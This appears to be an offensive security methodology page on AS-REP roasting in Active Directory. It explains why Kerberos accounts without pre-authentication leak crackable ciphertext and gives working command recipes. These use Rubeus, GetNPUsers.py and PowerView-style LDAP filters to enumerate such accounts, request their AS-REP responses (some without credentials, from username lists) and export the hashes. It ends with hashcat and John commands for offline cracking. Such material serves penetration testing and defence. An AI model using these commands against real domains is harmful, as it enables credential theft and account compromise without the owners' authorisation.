# Exploitation - Kerberos AS\_REP roasting

### Overview

An AS-REP roasting attack targets the `Kerberos` authentication protocol and aims at recovering the password of user accounts that do not require `Kerberos` pre-authentication.

The attack relies on the fact that the `KRB_AS_REP` response, returned by the `Authentication Service (AS)` of the `KDC (Key Distribution Center)` in reply to an initial `KRB_AS_REQ` authentication request, contains data (the `enc-part`) encrypted with the client's long-term secret key, which is derived from the account's password.

By default, the `KRB_AS_REQ` must include a timestamp encrypted with the client's secret key (`PA-ENC-TIMESTAMP` pre-authentication data), so that the `KDC` verifies the user identity before returning a `KRB_AS_REP`. This check is skipped for user accounts that do not require `Kerberos` pre-authentication, i.e. accounts with the `DONT_REQ_PREAUTH` flag set in their `userAccountControl` attribute: anyone who can reach the `KDC` and knows the username obtains a `KRB_AS_REP` for the account. The resulting ciphertext can be cracked offline against the account's password. Offline cracking is much faster than online guessing, is not subject to lockout or throttling, and the guessing attempts themselves generate no events on the domain controllers.

### Automated DONT\_REQ\_PREAUTH user accounts discovery and export of AS-REP responses

The following tools can be used to automate the discovery of user accounts that do not require `Kerberos` pre-authentication and the request and export of the corresponding `KRB_AS_REP` responses for offline cracking.

In order to enumerate the domain user accounts (through `LDAP`), `Rubeus` / `GetNPUsers.py` must be run in a domain-authenticated security context or be provided with valid domain credentials.

```
# Enumerates, through LDAP in the current security context, the user accounts without
# pre-authentication and requests a KRB_AS_REP for each of them.
Rubeus.exe asreproast /outfile:<FILE>
# The output format can be selected with /format:john or /format:hashcat.
Rubeus.exe asreproast /format:john /outfile:<FILE>

# Same operation, using explicit credentials for the LDAP enumeration.
Rubeus.exe asreproast /creduser:'<DOMAIN_FQDN>\<USERNAME>' /credpassword:'<PASSWORD>' /dc:<DC_HOSTNAME | DC_IP> /domain:<DOMAIN_FQDN> /outfile:<FILE_PATH>

# Enumerates, through LDAP with the given credentials, the user accounts without
# pre-authentication and requests a KRB_AS_REP for each of them.
GetNPUsers.py -request [-format hashcat | john] [-outputfile <FILE>] <DOMAIN>/<USERNAME>[:<PASSWORD>]
```

### DONT\_REQ\_PREAUTH user accounts discovery

The following tools can be used to discover user accounts that do not require `Kerberos` pre-authentication:

```
# userAccountControl bit 0x400000 (4194304) = DONT_REQ_PREAUTH.
# The 1.2.840.113556.1.4.803 matching rule (LDAP_MATCHING_RULE_BIT_AND) tests that bit.
Get-ADUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Get-ADUser -Server <DC_HOSTNAME | DC_IP> -Credential <PSCredential> -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"

# Same query through PowerView.
Get-NetUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Get-NetUser -Server <DC_HOSTNAME | DC_IP> -Credential <PSCredential> -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
```

### Request and export of KRB\_AS\_REP responses

The following tools can be used to request and export the `KRB_AS_REP` of specified user accounts that do not require `Kerberos` pre-authentication.

The following operations do not require valid domain credentials: only the username (and the domain) must be known, for example from a list of candidate usernames. With `Rubeus`, specifying both `/user` and `/domain` makes the tool send the `KRB_AS_REQ` directly; without `/domain`, the account is first looked up through `LDAP`, which requires a domain context.

```
Rubeus.exe asreproast /user:<USERNAME> /outfile:<FILE>
Rubeus.exe asreproast /dc:<DC_HOSTNAME | DC_IP> /domain:<DOMAIN_FQDN> /user:<USERNAME> /outfile:<FILE>

GetNPUsers.py '<DOMAIN>/' -usersfile <USERNAMES_FILE>
GetNPUsers.py '<DOMAIN>/' -dc-ip <DC_HOSTNAME | DC_IP> -usersfile <USERNAMES_FILE> -format john
```

### Offline cracking of KRB\_AS\_REP responses

Both `John the Ripper` (magnumripper / jumbo fork, `--format=krb5asrep`) and `hashcat` can be used to crack the `KRB_AS_REP` responses.

`Rubeus` and `GetNPUsers.py` request `RC4-HMAC` (encryption type 23) by default. The hash must respect the following format to be recognized by `hashcat` (mode 18200):

```
# ENCRYPTION_TYPE 23 = RC4-HMAC (hashcat mode 18200)
# ENCRYPTION_TYPE 17 = AES128-CTS-HMAC-SHA1-96 (hashcat mode 32100, hashcat 6.2.6+)
# ENCRYPTION_TYPE 18 = AES256-CTS-HMAC-SHA1-96 (hashcat mode 32200, hashcat 6.2.6+)

# hashcat mode 18200: a 16-byte HMAC-MD5 checksum (32 hex characters), then the RC4 ciphertext.
$krb5asrep$23$<USERNAME>@<DOMAIN>:<CHECKSUM_HEX>$<ENC_DATA_HEX>

# John format, as written by Rubeus /format:john and GetNPUsers.py -format john (no encryption type field).
$krb5asrep$<USERNAME>@<DOMAIN>:<CHECKSUM_HEX>$<ENC_DATA_HEX>
```

Depending on the tool and format used, the exported hash may need to be manually updated: `hashcat` requires the `$23$` encryption type field after `$krb5asrep$`, which the `John` format omits.

The following commands can be used to crack the `KRB_AS_REP` responses:

```
# GPU throughput depends on the driver stack (CUDA / OpenCL); check hashcat's supported drivers for the platform in use.
# RC4-HMAC (encryption type 23) KRB_AS_REP hashes.
hashcat -m 18200 -a 0 [-r <RULE_FILE>] <HASHFILE> <WORDLIST>

john --format=krb5asrep --wordlist=<WORDLIST> <HASHFILE>
```

***

### References

- <https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/>
- <https://tools.ietf.org/html/rfc4120#page-60>
- <https://beta.hackndo.com/kerberos-asrep-roasting/>
- <https://adsecurity.org/?p=227>
